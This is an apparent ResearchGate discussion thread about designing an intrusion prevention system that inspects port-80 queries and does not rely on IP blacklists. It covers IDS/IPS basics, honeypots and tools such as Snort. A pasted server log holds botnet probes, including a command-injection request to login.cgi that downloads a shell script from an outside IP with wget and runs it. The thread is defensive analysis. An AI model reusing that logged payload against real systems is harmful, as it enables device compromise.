Almost every properly configured commercial system will have only one TCP/IP port open to the Internet: Port 80.
Since this is the only way into the system, hackers will try many different ways to compromise it via this port. Surprisingly, there are only about 80 to 90 different hack queries in common use over the last 6 years, or so.
Commonly available IDS/IPS systems seem to only fall into one category, which keeps a blacklist of several hundred thousand malicious addresses, to which it refers every time a query appears on port 80. To stay current, the blacklist is updated every few days.
Since there are only about 80 distinct hack query formats, doesn't it make more sense to evaluate the threat by examining the query?
That's how we designed our IPS
https://www.researchgate.net/project/IDaaS-with-secure-data-at-rest/update/5b8f19fccfe4a76455f0c213?_iepl%5BviewId%5D=7PJXGOO2rJBWn0d2VYesBa4Z&_iepl%5Bcontexts%5D%5B0%5D=projectUpdatesLog&_iepl%5BinteractionType%5D=projectUpdateDetailClickThrough
Intrusion Detection System and Intrusion Prevention System increase the security level, Monitoring traffic and scrutinizing packet and design mainly for signicription methods of network security protocol. The first one reports the interruption and preventive technical constraints that whether the incoming data is from a legitimate user or not while the second one analyze the whole traffic on the network.
IPS = Intrusion Prevention System, stop any sort of intrusion before it happens
IDS = Intrusion Detection System, detect intrusions after they happen
The blacklist rules you are talking about would most often be implemented in a firewall (as it is usually the first appliance to see a request from the outside). Firewalls could technically be considered an Intrusion Prevention Device since it is preventing the outside requests from entering the network.
Common Intrusion Detection Services include honey-pots or internal network analysis tools. These tools are employed within a network to try to detect any bad behavior that has made its way past the firewall and other IPSs. Honey-pots are systems made to look like regular computers and offer up 'vulnerable' services that seem very enticing for hackers but everyday operations within the network will not interact with the honeypot. Once a hacker begins attacking the honey-pot the alarms will go off and the administrators will know that an intruder is in the network.
To answer your followup question: that specific botnet may have only used those 80 common queries but other botnets can(and probably will) use many other different queries. Telling your IPS system(firewall) to block those specific queries is a good start, but in order to battle more and more botnets you need to start thinking about the behavior and timing of the attacks as well as the source location of the attacks.
I would recommend looking up Bro and Snort for Intrusion Detection Systems, they are very powerful and opensource products that can be deployed on a raspberry pi or other compute device.
I didn't mean to give the impression that these were gathered from only one botnet. Over the last 7 years, we have been attacked by many such parasites and, as I write this, there are four separate botnets, trying their luck. These are based in totally disparate parts of the world, as the following sample might indicate:
46.32.183.64 - - [08/Sep/2018:06:43:07 +1000] "GET /wp-login.php HTTP/1.1" 404 210
46.32.183.64 - - [08/Sep/2018:06:43:07 +1000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
46.32.183.64 - - [08/Sep/2018:06:43:08 +1000] "GET /administrator/index.php HTTP/1.1" 404 221
46.32.183.64 - - [08/Sep/2018:06:43:08 +1000] "GET /administrator/index.php HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
46.32.183.64 - - [08/Sep/2018:06:43:09 +1000] "GET /admin.php HTTP/1.1" 404 207
46.32.183.64 - - [08/Sep/2018:06:43:09 +1000] "GET /admin.php HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
46.32.183.64 - - [08/Sep/2018:06:43:09 +1000] "GET /bitrix/admin/index.php?lang=en HTTP/1.1" 404 220
46.32.183.64 - - [08/Sep/2018:06:43:09 +1000] "GET /bitrix/admin/index.php?lang=en HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
46.32.183.64 - - [08/Sep/2018:06:43:10 +1000] "GET /admin/login.php HTTP/1.1" 404 213
46.32.183.64 - - [08/Sep/2018:06:43:10 +1000] "GET /admin/login.php HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
46.32.183.64 - - [08/Sep/2018:06:43:10 +1000] "GET /admin/ HTTP/1.1" 404 204
46.32.183.64 - - [08/Sep/2018:06:43:10 +1000] "GET /admin/ HTTP/1.1" 404 204 "-" "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
46.32.183.64 - - [08/Sep/2018:06:43:11 +1000] "GET /user/ HTTP/1.1" 404 203
46.32.183.64 - - [08/Sep/2018:06:43:11 +1000] "GET /user/ HTTP/1.1" 404 203 "-" "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
177.22.64.201 - - [08/Sep/2018:01:11:59 +1000] "POST /hacker.txt/trackback/ HTTP/1.1" 403 16896
177.22.64.201 - - [08/Sep/2018:01:11:59 +1000] "POST /hacker.txt/trackback/ HTTP/1.1" 403 16896 "http://www.zub66.ru/lechenie-zubov/plombirovanie-kornevykh-kanalov-s-ispolzovaniem-guttaperchevykh-shtiftov/kanalov.prl" "PHP/5.2.36"
213.13.119.80 - - [08/Sep/2018:00:27:25 +1000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226
213.13.119.80 - - [08/Sep/2018:00:27:25 +1000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
5.202.148.50 - - [08/Sep/2018:03:25:03 +1000] "POST /hacker.txt/trackback/ HTTP/1.1" 403 16896
5.202.148.50 - - [08/Sep/2018:03:25:03 +1000] "POST /hacker.txt/trackback/ HTTP/1.1" 403 16896 "https://Www.Giffgaffed.com/" "PHP/5.3.37"
I suppose it does make more sense to evaluate the threat by examining the query, but I need to do some more research in order to properly address your question. Also, those POST requests in your sample caught my attention.
Karen M. Krahl : If you'd like some more samples, I've got 18360 of the WordPress queries, 3272 of the trackback queries - which latter must be IoT devices with an easy vulnerability, judging by the ease with which the parasite can infect them. These numbers are growing by the minute, but not very fast, as each zombie is neutralised by the ISP. If I turn off the IDS, the queries scroll up the screen like a Las Vegas one-armed bandit, so it looks like this is an attempted DDoS.
Mark, is that the same data that you recently made available or a different data set? I have not had time to comb through the former yet. I shudder to think how bad the problem would be if ISPs were not neutralizing the zombies. Your question makes me wonder how we can improve upon current prevention (and detection) tools.
The other data was sorted to give one example of each hack. I was going to do a special extract of raw data, with IP addresses and date/time, which might be useful for region identification, temporal mapping etc.
As far as I can tell, the trackback queries seem to be a script, which starts and stops about three times a day - presumably to give the criminal time to infect more devices.
- Badges
- Science topic
- Similar topics
- Political Science
- International History and Politics
- Globalization